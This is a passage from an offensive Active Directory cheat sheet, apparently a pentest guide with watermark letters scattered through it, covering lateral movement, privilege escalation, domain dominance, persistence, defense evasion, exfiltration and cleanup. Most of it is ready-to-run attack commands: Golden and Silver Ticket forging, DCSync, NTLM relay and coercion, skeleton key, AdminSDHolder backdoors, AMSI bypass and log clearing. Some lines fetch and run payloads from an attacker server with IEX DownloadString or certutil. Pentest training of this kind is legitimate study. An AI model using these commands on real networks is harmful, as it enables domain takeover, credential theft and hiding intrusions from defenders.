Invoke-Command -ComputerName ServerB -Credential $cred1
AF

-ScriptBlock { Invoke-Command -ComputerName ServerC -Credential

$cred2 -ScriptBlock {whoami} }​

■​ Register PSSession Configuration (CredSSP or RunAs):​

Register-PSSessionConfiguration -Name <ConfName> -RunAsCredential
$cred​
​
(requires admin on intermediate host). Then Enter-PSSession
-ComputerName ServerB -ConfigurationName <ConfName>.
●​ PsExec (Sysinternals - SMB, admin on target):​
PsExec.exe \\<Target_IP> -u <DOMAIN\USER> -p <PASSWORD> cmd.exe​
 ​
Use -s for SYSTEM. Can also be used with PtH if run from a context where hash is
already passed.
●​ SMB Based (Impacket tools):​
smbexec.py <DOMAIN>/<USER>:<PASS_or_HASH>@<TARGET>​
atexec.py <DOMAIN>/<USER>:<PASS_or_HASH>@<TARGET> "command"​

●​ WMI Based (wmic, Impacket wmiexec.py, PowerShell Invoke-WmiMethod):​

wmiexec.py <DOMAIN>/<USER>:<PASS_or_HASH>@<TARGET> "whoami"​
​
PowerShell:​
Invoke-WmiMethod -ComputerName <Target> -Class Win32_Process -Name
M

Create -ArgumentList "payload.exe" -Credential $cred​

ad

​
wmic /node: /user: /password: process call create "command"​
e
By

●​ NTLM Relay Attacks (if SMB signing disabled/not required):

○​ Tools: Responder.py, ntlmrelayx.py
○​ sudo ntlmrelayx.py -tf targets_smb_signing_disabled.txt -smb2support -i​
KA

​
(Interactive SMB shell)
R

○​ Relay to AD CS (ESC8):​
IM

sudo ntlmrelayx.py ... -t http://<ADCS_IP>/certsrv/certfnsh.asp --adcs

--template <TemplateName>​
AS

○​ Coercion:​
H

PetitPotam.py <attacker_relay_IP> <DC_to_coerce>​

R

PrinterBug.py <DC_to_coerce> <attacker_relay>​

AF

DFSCoerce.py <attacker_relay> <DC_to_coerce>​

​
(Use with ntlmrelayx.py targeting AD CS or other services).
●​ Exploiting Service Misconfigurations:
○​ Check config:​
sc.exe \\<Target_IP> qc <ServiceName>​

○​ Check perms:​
accesschk.exe -uwcqv <USER> <ServiceName>​
​
(Sysinternals)
 ○​ Action: If perms allow, modify binPath to payload, restart service.
●​ Scheduled Tasks (schtasks.exe):
○​ Legacy:​
at \\<Target_IP> 13:37 /interactive cmd.exe​

○​ Modern:​
schtasks /create /s <Target_IP> /u <DOMAIN\USER> /p <PASSWORD> /tn
<TaskName> /tr "C:\path\to\payload.exe" /sc ONCE /st HH:MM​
schtasks /run /s <Target_IP> /u <DOMAIN\USER> /p <PASSWORD> /tn
<TaskName>​
schtasks /delete /s <Target_IP> /u <DOMAIN\USER> /p <PASSWORD> /tn
<TaskName> /f​
M
ad

■​ For SYSTEM: /ru System

●​ DCOM Lateral Movement:
e

○​ Tools: Invoke-DCOM (PowerShell), Impacket dcomexec.py.

By

○​ Example (Impacket):​
dcomexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET_IP> -object
KA

ShellBrowserWindow "ping -n 1 <Your_IP>"​

R

●​ MSSQL Linked Servers:​

IM

EXECUTE('xp_cmdshell "whoami"') AT "<LinkedServerName>";​

AS

●​ SCCM:​
SharpSCCM.exe invoke client-push -t <Target>​
H
R

●​ Sliver C2 Pivoting: socks5 start -P <port>, pivots named-pipe-bind <pipename>,

rportfwd add -b <bind_port> -r <remote_host>:<remote_port>
AF

●​ Port Forwarding (e.g., Chisel, netsh):​

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0
listenport=<LocalPortOnCompromisedHost> connectaddress=<InternalTargetIP>
connectport=<InternalTargetPort>​

○​ Chisel: Server on attacker: ./chisel server -p <port> --reverse. Client on

compromised host: chisel.exe client <attacker_IP>:<port> R:socks
●​ SharpNoPSExec / NimExec: Fileless remote command execution via service
manipulation.
●​ Reg.exe (Remote Registry): If RemoteRegistry service is running and
permissions allow.
○​ E.g., IFEO debugger:​
reg.exe add "\\<target>\HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t
REG_SZ /d "\\<attacker_smb_server>\share\payload.exe"​
​
(Payload runs when msedge.exe starts). Requires AllowInsecureGuestAuth if
SMB share is anonymous.
M
ad
e
By
KA
R
IM
AS
H
R
AF
Phase 5: Privilege Escalation - Climbing the Ladder (Local &
Domain) 🪜
Your Goal Here: Elevate privileges from a compromised user account (standard user, local
admin) to a higher level, ideally Domain Admin or Enterprise Admin on the domain, or SYSTEM
on a local machine.
Pro Tip: Enumerate thoroughly on the compromised host (for local privesc) and the domain
(for domain privesc). Misconfigurations, vulnerabilities, and excessive permissions are your
friends. BloodHound is key for visualizing AD attack paths.
5.1 Local Privilege Escalation (Windows)
Goal: Elevate from a standard user to Local Administrator or SYSTEM on the current machine.
Tools for Enumeration & Exploitation:
M

●​ PowerUp.ps1 (PowerSploit): Invoke-AllChecks

●​ Sherlock.ps1: Find-AllVulns or Invoke-Sherlock
ad

●​ Seatbelt.exe: Seatbelt.exe -group=all -full

e

●​ Windows Exploit Suggester - Next Generation (WES-NG): systeminfo >

systeminfo.txt (on target), then wes.py systeminfo.txt (on attack machine).
By

●​ Juicy Potato / Rotten Potato / PrintSpoofer / GodPotato / Lovely Potato:

Token abuse (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege).
KA

●​ Metasploit: post/multi/recon/local_exploit_suggester, exploit/windows/local/...,

post/windows/escalate/getsystem
R

●​ BeRoot, Privesc.py/ps1, FullPowers.

IM

Common Techniques:
AS

●​ Kernel Exploits: Identify missing patches. Caution: Unstable.

●​ Misconfigured Services / Weak Service Permissions:
H

○​ Unquoted Service Paths:​

R

wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v

AF

"c:\windows\\" | findstr /i /v """​

​
If path C:\Program Files\Some Dir\service.exe is unquoted, try placing
C:\Program.exe.
○​ Writable Service Binaries:​
icacls <PathToServiceExecutable>​
​
Replace binary, restart service.
○​ Writable Service Registry Config:​
reg query HKLM\SYSTEM\CurrentControlSet\Services\<SvcName>​
accesschk.exe -uvwqk HKLM\SYSTEM\CurrentControlSet\Services\<SvcName>​
​
 Modify ImagePath.
○​ DLL Hijacking for Services.
●​ AlwaysInstallElevated:
○​ Check:​
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v
AlwaysInstallElevated​
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v
AlwaysInstallElevated​
​
Both must be 0x1.
○​ Exploit: msfvenom ... -f msi -o payload.msi, then msiexec /quiet /qn /i
payload.msi.
M

○​ PowerUp: Get-RegistryAlwaysInstallElevated, Write-UserAddMSI.

ad

●​ Stored Credentials / Password Mining (Locally):

○​ PowerShell history: Get-History or file
e

(Get-PSReadlineOption).HistorySavePath.
By

○​ Credential Manager: cmdkey /list.

○​ Windows Vault: VaultCmd.exe /list.
KA

○​ Browser vaults, config files, scripts, user docs.

●​ Group Policy Preferences (GPP) Passwords (Local/SYSVOL): PowerUp:
R

Get-GPPPassword.
IM

●​ Token Impersonation/Theft (Requires SeImpersonatePrivilege or

SeAssignPrimaryTokenPrivilege):
AS

○​ PrintSpoofer:​
PrintSpoofer.exe -i -c "C:\path\to\payload.exe"​
H

​
(runs payload as SYSTEM).
R

○​ Metasploit Incognito: use incognito, list_tokens -u, impersonate_token "NT

AF

AUTHORITY\SYSTEM".
○​ Invoke-TokenManipulation (PowerSploit).
●​ Scheduled Tasks with Weak Permissions.
●​ DLL Hijacking (Applications).
●​ PATH Interception.
●​ CVEs: SMBGhost (CVE-2020-0796), HiveNightmare/SeriousSAM
(CVE-2021-36934).
●​ Further Reading: Windows Local Privilege Escalation Cookbook (FuzzySecurity).
5.2 Domain Privilege Escalation
Goal: Elevate from local admin/domain user to Domain Admin or Enterprise Admin.
●​ Exploiting Kerberos Delegation:
○​ Unconstrained Delegation:
■​ Condition: Compromise UCD host. DA authenticates. DA's TGT cached in
LSASS.
■​ Find: Get-NetUser -Unconstrained, Get-NetComputer -Unconstrained.
■​ Exploit: Dump LSASS (mimikatz sekurlsa::tickets /export), PtT DA's TGT.
■​ Coerce Auth (Printer Bug/SpoolSample):​
SpoolSample.exe <DA_Machine_or_DC> <Compromised_UCD_Host>​

○​ Constrained Delegation (S4U2Self, S4U2Proxy):

■​ Find: Get-DomainUser/Computer -TrustedToAuth.
■​ Traditional CD: If control SvcA trusted to delegate to SPN_on_Target,
M

impersonate UserX to SPN_on_Target.

ad

■​ Rubeus:​
Rubeus.exe s4u /user:SvcA /rc4:Hash_SvcA /impersonateuser:UserX
e

/msdsspn:SPN_on_Target /altservice:cifs/DC01 /ptt​

By

■​ Kekeo: tgt::ask ..., then tgs::s4u ...

KA

○​ Resource-Based Constrained Delegation (RBCD):

■​ Condition: Write access to target computer's
R

msDS-AllowedToActOnBehalfOfOtherIdentity.
IM

■​ Exploit: Modify target's attribute to allow ControlledUser to impersonate.

Then S4U from ControlledUser as DA to target.
AS

■​ Powermad:​
New-MachineAccount -MachineAccount AttackerPC -Password <pass>​
H
R

■​ PowerView: Craft SD,​

Set-DomainObject -Identity TargetComputer -Set
AF

@{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}​

■​ Rubeus (S4U):​
Rubeus.exe s4u /user:AttackerPC$ /rc4:<hash_of_AttackerPC$>
/impersonateuser:Administrator /msdsspn:HOST/TargetComputer
/altservice:cifs /ptt​

●​ Abusing ACLs/DACLs on AD Objects:

○​ Condition: Compromised user has excessive perms (GenericAll, GenericWrite,
WriteDACL, WriteOwner, WriteProperty for member or userPassword) on DA
user/group, DC computer, GPO, OU.
 ○​ Reset DA password: PowerView Set-DomainUserPassword -Identity
<DA_User> -Password <NewPassword>. Native: net user <DA_User>
<NewPassword> /domain.
○​ Add to DA group: PowerView Add-DomainGroupMember -Identity "Domain
Admins" -Members <YourUser>.
○​ Tools: PowerView (Get-ObjectAcl, Find-InterestingDomainAcl), BloodHound,
dsacls.exe, Set-Acl, aclpwn.py, Invoke-ACLPwn.
○​ Dacledit.py (Impacket fork):​
python3 examples/dacledit.py -principal <attacker> -target <victim_object>
-action read -dc-ip <DC_IP> <domain/user:pass>​

■​ To add rights: -action write -rights WriteMembers -ace-type allowed

M

○​ AdminSDHolder: Modify ACL on

ad

CN=AdminSDHolder,CN=System,<DomainDN>.
●​ Shadow Credentials (msDS-KeyCredentialLink):
e

○​ Condition: WriteProperty on msDS-KeyCredentialLink for target

By

user/computer.
○​ Tools: Whisker.exe add /target:TargetUser$, Certipy shadow auto ...,
KA

PyWhisker.
○​ Auth with new cred:​
R

Rubeus.exe asktgt /user:TargetUser$ /certificate:<PFX_or_Base64>

IM

/password:<PFXPass_if_any> /ptt​
AS

○​ PKINITtools:​
gettgtpkinit.py -pfx-base64 <base64_cert> <domain/target_user$>
H

<output.ccache>​
R

getnthash.py -key <AS_REP_key_from_gettgtpkinit> <domain/target_user$>​

​
AF

(needs KRB5CCNAME set to ccache).

●​ AD CS Exploitation (ESC1-ESC11, Certifried):
○​ Tools: Certify.exe find /vulnerable, Certipy find -vulnerable ..., ForgeCert.exe
(Rubeus component).
○​ ESC1 Conditions: Template allows "Enrollee Supplies Subject" (SAN), low-priv
enrollment rights, EKU allows authentication (Client Auth, Smart Card Logon,
Any Purpose).
○​ ESC1 Exploit:​
Certify.exe request /ca:<CA_Name> /template:<VulnerableTemplateName>
/altname:<DA_UPN>​
​
 certipy req -ca <CA_Name> -template <VulnerableTemplateName> -upn
<DA_UPN> ...​

○​ ESC8 (NTLM Relay to AD CS HTTP):​

sudo ntlmrelayx.py ... -t http://<ADCS_Server>/certsrv/certfnsh.asp --adcs
--template <TemplateName>​

○​ Auth with cert:​

Rubeus.exe asktgt /user:<DA_UPN_or_ImpersonatedUser>
/certificate:<PathToPfxFile_or_Base64Cert> /password:<PfxPassword_if_any>
/ptt​
M

●​ MSSQL PrivEsc: If SQL service account is DA, or SQL on DC. xp_cmdshell,

ad

impersonate, trustworthy DBs.

●​ SCCM Site Takeover: NTLM Relay to MSSQL Site DB or SMS Provider.
e

●​ Abusing Trust Relationships / Trust Attacks:

By

○​ Intra-Forest (Child to Parent): Unconstrained Delegation (Printer Bug), GPO

on Site, GoldenGMSA, DNS Trust attack, Foreign Group/ACL abuse.
KA

○​ Cross-Forest: Trust Account Attack, Unconstrained Delegation, SID History

Injection, SID Filter Bypass (CVE-2020-0665), Abusing SQL Server Links,
R

Abusing PAM Trusts/Shadow Principals.

IM

○​ SID History Abuse (Forge Golden Ticket with EA SID from parent/root in
sIDHistory).
AS

●​ GPO Abuse: If write access to GPO linked to DCs/sensitive OUs. Deploy malicious
task/script.
H

○​ PyGPOAbuse:​
R

pyGPOAbuse.py -u <user> -p <pass> -d <domain> --gpo-name

"<GPO_Name>" --task-name "EvilTask" --command "payload.exe"
AF

●​ Specific Vulnerabilities:
○​ ZeroLogon (CVE-2020-1472): Reset DC machine account pass. Tools:
SharpZeroLogon, Invoke-ZeroLogon, ZeroDump. Mitigation: Apply security
updates from August 2020 and later; enable secure RPC enforcement.
○​ PrintNightmare (CVE-2021-1675/34527): RCE as SYSTEM via Print Spooler.
○​ NoPAC (CVE-2021-42278/42287): Standard user to DA. noPAC C# tool,
sam-the-admin.py.
○​ sAMAccountName Spoofing (related to NoPAC): Change computer
account sAMAccountName to DC's name, request TGT.
○​ ShadowCoerce (MS-FSRVP): Coerce auth via File Server Remote VSS
Protocol.
○​ DFSCoerce (MS-DFSNM): Coerce auth via Distributed File System
Namespace Management Protocol.
○​ Certifried (CVE-2022-26923): Certificate-based machine account
impersonation.
M
ad
e
By
KA
R
IM
AS
H
R
AF
Phase 6: Domain Dominance - Owning the Kingdom 👑
Your Goal Here: Achieve full, persistent control over the Active Directory domain. This usually
means compromising Domain Admin credentials, Enterprise Admin credentials (for
forest-level control), or gaining direct control of Domain Controllers and the krbtgt account.
Pro Tip: The "Golden Ticket" is the ultimate prize for domain persistence and control. DCSync
provides all domain hashes.
Your Toolkit & Commands:
●​ Golden Ticket Attack (Requires krbtgt account's NTLM hash or AES keys):
○​ Goal: Forge a TGT for any user (real or fake) with any privileges. Signed with
krbtgt credentials.
○​ Obtain krbtgt hash/keys: Dump NTDS.dit (Phase 3).​
M

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL | grep krbtgt​

​
ad

Mimikatz (on DC):​

e

lsadump::dcsync /user:krbtgt /domain:<DomainFQDN>​

By

○​ Forge with Mimikatz:​

kerberos::golden /user:<FakeOrRealUserToImpersonate>
KA

/domain:<DomainFQDN> /sid:<DomainSID_of_TargetDomain>
/krbtgt:<krbtgt_NTLM_Hash_or_AESKey> [/aes128|/aes256|/rc4]
R

/id:<RID_of_User_e.g_500_for_Admin>
IM

/groups:<RIDs_of_Groups_e.g_512_for_DA,519_for_EA> /startoffset:0
/endin:600 /renewmax:10080 /ptt​
AS

■​ /user: Username to impersonate.

H

■​ /domain: Fully Qualified Domain Name.

R

■​ /sid: SID of the domain (not the krbtgt SID).

AF

■​ /krbtgt: NTLM hash or AES key of the krbtgt account.

■​ /id: Relative ID (RID) of the user to impersonate (e.g., 500 for built-in
Administrator).
■​ /groups: Comma-separated RIDs of groups to include (e.g., 512 for Domain
Admins, 519 for Enterprise Admins, 518 for Schema Admins).
■​ /ptt: Pass-the-Ticket (injects the forged ticket into current session).
○​ Forge with Impacket ticketer.py:​
ticketer.py -nthash <krbtgt_NTLM_Hash> -domain-sid <DomainSID> -domain
<DomainFQDN> -user-id 500 -groups 512 <FakeUser>​
​
(Outputs .ccache). Usage: export KRB5CCNAME=<ticket.ccache>, then
 Impacket tools with -k -no-pass.
○​ Forge with Rubeus:
■​ NTLM Hash:​
Rubeus.exe golden /user:<FakeUser> /domain:<DomainFQDN>
/sid:<DomainSID> /rc4:<krbtgt_NTLM_Hash> /userid:500 /groups:512 /ptt​

■​ AES256 Key:​
Rubeus.exe golden /user:<FakeUser> /domain:<DomainFQDN>
/sid:<DomainSID> /aes256:<krbtgt_AES256_Key> /userid:500 /groups:512
/ptt​

○​ Impact: Full domain compromise. Valid until krbtgt password changed twice.
M

●​ Silver Ticket Attack (Requires Service Account NTLM Hash or AES keys):
ad

○​ Goal: Forge a TGS for a specific service on a specific server. No DC

communication after forging.
e

○​ Obtain Service Account Hash/Keys: Kerberoasting (Phase 3) or LSASS

By

dump on service host.

○​ Forge with Mimikatz:​
KA

kerberos::golden /user:<UserToImpersonate> /domain:<DomainFQDN>

/sid:<DomainSID> /target:<TargetServerFQDN>
R

/service:<ServiceName_e.g_cifs,host,http>
IM

/rc4:<ServiceAccount_NTLM_Hash_or_AESKey> [/aes128|/aes256]
/id:<RID_of_User> /ptt​
AS

○​ Forge with Impacket ticketer.py:​

H

ticketer.py -nthash <ServiceAccount_NTLM_Hash> -domain-sid <DomainSID>

R

-domain <DomainFQDN> -spn <SPN_of_Service_e.g_cifs/fileserver.corp.local>

<UserToImpersonate>​
AF

○​ Forge with Rubeus:​

Rubeus.exe silver /user:<UserToImpersonate> /domain:<DomainFQDN>
/sid:<DomainSID> /target:<TargetServerFQDN> /service:<ServiceName>
/rc4:<ServiceAccount_NTLM_Hash> /userid:<RID_of_User> /ptt​

○​ Impact: Access specific service on target server as impersonated user.

●​ DCSync Attack (Requires DA or specific replication rights):
○​ Goal: Impersonate a DC, request password data via DRS Remote Protocol.
○​ Required Privs: DS-Replication-Get-Changes &
DS-Replication-Get-Changes-All on the domain object.
 ○​ Mimikatz:
■​ Target specific user:​
lsadump::dcsync /user:<Domain>\<UserToTarget_e.g_krbtgt_or_DA_User>
/domain:<DomainFQDN> [/dc:<Target_DC>]​

■​ Dump all:​
lsadump::dcsync /all /csv​

○​ Impacket secretsdump.py:
■​ Target specific user:​
secretsdump.py
<DOMAIN>/<DA_User>:<Password_or_Hash>@<Target_DC_IP_or_FQDN>
M

-just-dc-user <UserToTarget_e.g_krbtgt>​
ad

■​ Dump all:​
e

secretsdump.py
By

<DOMAIN>/<DA_User>:<Password_or_Hash>@<Target_DC_IP_or_FQDN>
-just-dc​
KA

​
(or -just-dc-ntlm for only NTLM hashes)
R

●​ AdminSDHolder Abuse: (See Phase 5 & 7) Modify ACLs on

IM

CN=AdminSDHolder,CN=System,<DomainDN>.
●​ Skeleton Key Attack (Injects master password into LSASS on DCs):
AS

○​ Goal: Allows domain auth with a universal password. Original passwords still
work.
H

○​ Mimikatz (SYSTEM on ALL DCs):​

privilege::debug​
R

misc::skeleton​
AF

​
If LSA PPL: !+, !processprotect ..., misc::skeleton, !-.
○​ Impact: Domain-wide access. Lasts until DC reboots/LSASS restarts. Highly
intrusive and detectable.
●​ Modifying Domain Controller Group Policies: If rights to edit "Default Domain
Controllers Policy" or GPOs linked to DCs OU.
●​ Forest Trust Abuse: If EA compromised in forest root, often implicit admin in
child domains. Get-NetForestTrust.
●​ DCShadow Attack (Advanced - DA or specific rights):
○​ Goal: Temporarily register rogue DC to push malicious AD object changes
(e.g., SIDHistory, SPNs).
○​ Mimikatz:​
lsadump::dcshadow /object:<DN_to_modify> /attribute:<attr_name>
/value:<new_value>​
lsadump::dcshadow /push​

○​ Detection: Network monitoring for DRSUAPI DRSUAPI_REPLICA_ADD from

non-DCs. Event IDs 5136, 5141.
M
ad
e
By
KA
R
IM
AS
H
R
AF
Phase 7: Persistence - Staying In 🚪🚶
Your Goal Here: Ensure continued access to the compromised environment.
Pro Tip: Blend in. Use legitimate mechanisms. Golden Tickets & AdminSDHolder are powerful.
Avoid noisy techniques.
Your Toolkit & Commands/Techniques:
●​ Golden Ticket / Silver Ticket: (See Phase 6).
○​ Pro Tip (Golden Ticket): Create Golden Tickets for non-existent users or with
specific SIDs to make them harder to track. Remember, changing the krbtgt
password twice invalidates all Kerberos tickets, including Golden Tickets.
●​ DCSync Rights for Stealthy Account:
○​ Grant DS-Replication-Get-Changes & DS-Replication-Get-Changes-All to a
M

controlled account.
ad

○​ PowerView:​
Add-ObjectAcl -TargetADSprefix 'DC=corp,DC=local'
e

-PrincipalSamAccountName <StealthyUser> -Rights DCSync​

By

○​ ADModule: Use New-Object

KA

System.DirectoryServices.ActiveDirectoryAccessRule and Set-Acl.

●​ AdminSDHolder Backdoor: Add controlled account/group to ACL of
R

CN=AdminSDHolder,CN=System,<DomainDN> with GenericAll rights.

○​ PowerView:​
IM

Add-ObjectAcl -TargetADSprefix
'CN=AdminSDHolder,CN=System,<DomainDN>' -PrincipalSamAccountName
AS

<YourStealthyUser> -Rights All​

H

○​ Force SDProp: Invoke-SDPropagator.ps1 or​

R

reg add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v

AF

"RunAdminSDExer" ...​
​
(risky).
●​ Scheduled Tasks (on critical servers/DCs):
○​ Command:​
schtasks /create /s <Target_IP> /u <SYSTEM_or_PrivilegedUser> /tn
<StealthyTaskName> /tr "C:\path\to\payload.exe" /sc ONSTART /ru SYSTEM /f​

●​ Service Creation/Modification:
○​ Command (create):​
sc.exe \\<Target_IP> create <StealthyServiceName> binPath=
 "C:\path\to\payload.exe" start= auto obj= "LocalSystem" DisplayName= "Legit
Looking Service"​

○​ Command (start):​
sc.exe \\<Target_IP> start <StealthyServiceName>​

●​ Startup Scripts (GPO, Local Registry/Folder):

○​ GPO: Modify Default Domain/DC Policy.
○​ Registry Run Keys: HKLM\Software\Microsoft\Windows\CurrentVersion\Run,
HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
○​ Startup Folders: C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp, %APPDATA%\Microsoft\Windows\Start
M

Menu\Programs\Startup.
ad

○​ SharpPersist: SharpPersist.exe -t startupfolder ..., -t reg ...

●​ DLL Hijacking (Persistent).
e

●​ COM Hijacking (Registry).

By

●​ WMI Event Subscription (Permanent): Invoke-WMIImplant, SharpWMI.

●​ Modifying User Logon Scripts (scriptPath attribute):​
KA

Set-ADUser -Identity <User> -ScriptPath "malicious.bat"​

​
R

(script on accessible share like SYSVOL).

IM

●​ Web Shells (on IIS/web servers).

●​ Hidden Users/Accounts: Create/modify accounts. Hide from GAL
AS

(msExchHideFromAddressLists = TRUE).
●​ DSRM (Directory Services Restore Mode) Abuse on DCs:
H

○​ Obtain DSRM hash (lsadump::sam on DC).

○​ Enable DSRM network logon:​
R

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" -Name

AF

DsrmAdminLogonBehavior -Value 2​

○​ PtH with DSRM hash.

●​ Custom Security Support Provider (SSP): Mimikatz: misc::memssp (logs creds).
Manual: Drop mimilib.dll, add to
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
●​ Sliver C2 Implants: generate beacon --persistent ...
●​ ACLs for Remote Management (WMI/PSRemote/Remote Registry):
PowerView: Set-RemoteWMI ..., Set-RemotePSRemoting ...
●​ Domain Controller Shadowing / Malicious Replication: (Highly Advanced &
Risky) Introduce a rogue DC or manipulate replication.
●​ Further Reading: "Sneaky Active Directory Persistence Tricks" (@PyroTek3),
MITRE ATT&CK Persistence.

M
ad
e
By
KA
R
IM
AS
H
R
AF
Phase 8: Defense Evasion - Staying Off the Radar 👻
Your Goal Here: Avoid detection by AV, EDR, SIEM, IDS/IPS, and blue teams.
Pro Tip: "Living off the land" (LOLBAS). C2 frameworks offer evasion. Understand detection
mechanisms.
Your Toolkit & Techniques:
●​ Antivirus/EDR Evasion:
○​ Custom Payloads/Shellcode: Packers, crypters, shellcode encoders
(msfvenom -e shikata_ga_nai -i <count>), encryption.
○​ In-Memory Execution: PowerShell​
IEX (New-Object
Net.WebClient).DownloadString('http://<Your_Server>/payload.ps1')​
M

​
ad

Reflective DLL Injection, Process Hollowing. Sliver: execute-assembly

--amsi-bypass --etw-bypass ...
e

○​ AMSI Bypass (Anti-Malware Scan Interface): Patch

By

AmsiScanBuffer/AmsiScanString in memory. Resources: GitHub

Amsi-Bypass-Powershell (e.g., by S3cur3Th1sSh1t), Invisi-Shell.
KA

○​ ETW Bypass/Patching: Sliver: --etw-bypass.

○​ Disabling/Tampering with AV/EDR (Risky, SYSTEM needed, highly
R

detectable).
IM

●​ Using Signed Binaries / LOLBAS (Living Off The Land Binaries and Scripts):
○​ Concept: Execute malicious code or achieve objectives using legitimate,
AS

signed Windows binaries.

○​ Examples: msbuild.exe, regsvr32.exe, rundll32.exe, wmic.exe, certutil.exe.
H

○​ Project: lolbas-project.github.io.
R

●​ Fileless Malware: Payloads reside only in memory or in non-traditional storage

like the registry, WMI, ADS.
AF

●​ Hiding Network Traffic (C2):

○​ Encryption: HTTPS/TLS, DNS over HTTPS (DoH)/DNS over TLS (DoT).
○​ Port Hopping/Common Ports: Use 80, 443, 53.
○​ Domain Fronting (Effectiveness varies).
○​ Randomized beaconing, jitter, sleep masks. C2 Profiles (Cobalt Strike
Malleable C2, Sliver profiles).
●​ Log Evasion/Tampering:
○​ Clearing Event Logs (Admin, VERY NOISY):​
wevtutil cl <LogName_e.g_Security,System,Application>​
​
Clear-EventLog -LogName Security​
 ○​ Disabling Logging (PowerShell Script Block/Module Logging): Modify
GPO or registry (e.g.,
HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
, set EnableScriptBlockLogging to 0).
○​ Invoke-Phantom: Windows Event Log Killer.
●​ Obfuscation:
○​ Code (PowerShell, VBS, .NET), Command (PowerShell).
○​ Tools: Invoke-Obfuscation.
●​ Alternate Data Streams (ADS - NTFS):​
type payload.exe > legitfile.txt:hidden.exe​
certutil.exe -urlcache -split -f http://<Your_Server>/payload.exe
M

file.exe:hidden.exe​
ad

●​ Time Stomping (Modifying File MACB Timestamps):

e

○​ PowerShell:​
By

Set-ItemProperty -Path <FilePath> -Name CreationTime -Value

<DateTimeObject>​
KA

Set-ItemProperty -Path <FilePath> -Name LastWriteTime -Value

<DateTimeObject>​
R

Set-ItemProperty -Path <FilePath> -Name LastAccessTime -Value

IM

<DateTimeObject>​
AS

○​ timestomp.exe.
●​ Using Non-Standard Tools / Custom C2.
H

●​ Masquerading / Process Doppelgänging / Herpaderping: Rename tools to look

R

legitimate (e.g., mimikatz.exe to svchost.exe).

UAC Bypass: DiskCleanup Scheduled Task Hijack (HKCU:\Environment\windir),
AF

●​
FodHelper Execution Hijack
(HKCU\Software\Classes\ms-settings\Shell\Open\command).
●​ AppLocker Bypass: Default rules (writable %WINDIR% subdirs like
C:\Windows\Tasks), LOLBAS (InstallUtil, RunDll32).
●​ PowerShell Constrained Language Mode Bypass: powershell.exe -Version 2,
.NET assemblies/Runspaces.
●​ Sharp-Suite: Process Argument Spoofing.
●​ Sysmon Evasion: sysmon-config-bypass-finder.
●​ HoneyTokens Evasion: Forging Trusts, Honeypot Buster.
●​ Further Reading: MITRE ATT&CK Defense Evasion.
Phase 9: Exfiltration - Stealing the Goods 💰 (Optional)
Your Goal Here: Extract sensitive data from the compromised network.
Pro Tip: Mind data size and network monitoring (DLP). Compress, encrypt, use covert
channels or blend with legitimate traffic. Exfiltrate in chunks.
Your Toolkit & Techniques:
●​ Common Protocols for Exfil:
○​ HTTP/HTTPS: POST requests. Tools: curl, wget, PowerShell
Invoke-WebRequest/Invoke-RestMethod.
○​ DNS: Encode data in DNS queries (Base64 chunks as subdomains). Tools:
dnscat2, iodine, DET. Slow but stealthy.
M

○​ ICMP: Encode data in ICMP echo packets. Tools: icmpsh, ptunnel-ng,

ad

PingTunnel. Slow, often blocked.

e

○​ FTP/SFTP/SCP: If available and outbound allowed.

○​ Email: Attachments (risky, size limits, AV).
By

●​ Covert Channels: Using non-standard protocols or abusing legitimate protocol

fields.
KA

●​ Data Staging: Collect/compress data on an internal compromised machine

before exfil. Compression: tar, zip, 7zip. PowerShell: Compress-Archive.
R

●​ Encryption: Encrypt data before exfil (AES, PGP/GPG). PowerShell:

IM

Protect-CmsMessage. OpenSSL: openssl enc -aes-256-cbc ...

●​ Throttling / Low and Slow: Exfiltrate data slowly to avoid traffic alerts.
AS

●​ Tools for Exfiltration:

○​ PowerShell: Invoke-WebRequest, Start-BitsTransfer (BITS).
H

○​ Python: requests (HTTP/S), socket.

R

○​ Rclone: Manage files on cloud storage.

AF

○​ C2 Frameworks: Built-in exfil modules (Sliver: download, upload, loot).

●​ Living Off The Land for Exfil: certutil.exe -encodehex ..., bitsadmin.exe.
Phase 10: Post-Exploitation & Cleanup - Covering Tracks 🧹
Your Goal Here: Remove tools, logs, and traces to hinder investigation. (Often minimal in
pentests where reporting is key, but crucial for real attackers).
Pro Tip: Cleanup can be noisy. Follow Rules of Engagement. Detailed reporting often
preferred.
Your Toolkit & Techniques:
●​ Removing Tools & Payloads:
○​ del /F /Q <FilePath>​

○​ Remove-Item -Path <File> -Force​

M
ad

○​ Secure Delete: sdelete.exe -p <passes> -z <File>. Remove ADS.

●​ Clearing Command History:
e

○​ PowerShell: Clear-History, Remove-Item

By

(Get-PSReadlineOption).HistorySavePath.
○​ Bash: history -c, delete ~/.bash_history.
KA

●​ Reverting System Changes: Undo persistence/privesc mods (registry, services,

tasks, firewall rules) if scoped and safe. Caution: Complex, risky.
R

●​ Removing User Accounts/Modifications: Remove-ADUser, net user <user>

IM

/delete. Revert ACL changes.

●​ Log Manipulation (VERY NOISY & RISKY - Avoid in Pentests unless explicitly
AS

scoped):​
wevtutil cl Security​
H
R

●​ Restoring Original Files (if DLLs/binaries replaced): Requires backups.

AF

●​ C2 Framework Cleanup: Terminate beacons/implants. Remove C2 persistence.

Clear C2 server logs if scoped.
●​ Network Device Cleanup: Revert router/firewall rules. Clear logs if accessed.
Mission Debrief: Your Next Move 🚀
Alright operator, you've got the intel. This cheat sheet is your tactical field guide for
dissecting Active Directory environments, from that first network ping to the echo of
domain admin privileges. Consider it your go-to when you're in the digital trenches, a
quick reference to the tools and TTPs that can make or break an engagement.

The Active Directory landscape isn't static – it's a dynamic battlefield. New exploits
surface, defensive technologies evolve, and attackers refine their craft. Your learning
M
